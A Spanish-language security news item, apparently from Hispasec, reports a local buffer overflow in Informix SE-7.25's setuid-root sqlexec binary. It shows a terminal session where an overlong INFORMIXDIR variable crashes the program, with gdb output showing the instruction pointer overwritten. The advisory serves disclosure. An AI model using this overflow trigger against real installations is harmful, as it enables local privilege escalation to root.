Se ha descubierto una nueva vulnerabilidad que afecta a Informix
SE-7.25, potente paquete de gestión de Base de Datos al igual que
de desarrollo.
Recientemente se ha conocido una vulnerabilidad que afecta a Informix
SE-7.25, en el momento de redactar esta noticia solamente se tiene
constancia de su explotación sobre plataforma Linux, pero todo hace
pensar que podría exportarse esta vulnerabilidad a otras plataformas
donde corra Informix SE-7.25.
El problema se produce al definir la variable INFORMIXDIR con un
tamaño superior a 2023 bytes, lo que provoca un desbordamiento
de buffer. Esto puede permitir a un usuario con privilegios sobre
/lib/sqlexec obtener nivel de administrador euid=0, en una
instalación por defecto de Informix SE-7.25.
[pask@dimoni lib]$ ls -FAlsc
total 2588
4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/
1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec*
504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd*
596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm*
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e ‘print «A»x2023’`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e ‘print «A»x2024’`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault
[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) info registers
…
esp 0x3fffed08 0x3fffed08
ebp 0x41414141 0x41414141
esi 0x3fffedf9 1073737209
edi 0x8191571 135861617
eip 0x41414141 0x41414141
…
roman@hispasec.com
Más información:
Local Vulnerability in Informix SE-7.25
http://hades2.concha.upv.es/~pask/advisories/2002/Informix%20sqlexec
Informix product family
http://www-3.ibm.com/software/data/informix/
Deja un comentario